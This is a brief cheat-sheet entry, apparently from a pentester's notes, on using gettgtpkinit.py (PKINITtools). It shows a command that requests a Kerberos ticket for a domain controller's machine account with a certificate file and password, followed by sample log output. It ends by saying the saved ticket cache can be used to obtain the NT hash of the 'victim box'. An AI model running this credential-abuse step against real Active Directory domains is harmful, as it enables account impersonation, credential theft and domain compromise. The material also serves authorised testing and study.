# gettgtpkinit.py

Part of pkinittools which "contains some utilities for playing with PKINIT and certificates."

# Request a TGT using a certificate and private key

gettgtpkinit.py -cert-pfx dc.pfx -pfx-pass 123456 domain.com/dc$ dc.ccache

Your output will be something like:

2025-10-02 14:35:36,055 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-10-02 14:35:36,072 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-10-02 14:35:36,093 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-10-02 14:35:36,093 minikerberos INFO     xxx
INFO:minikerberos:xxx
2025-10-02 14:35:36,096 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

And then you'll have a zyx.ccache saved to your current directory, which you can use to get the NT hash of your victim box.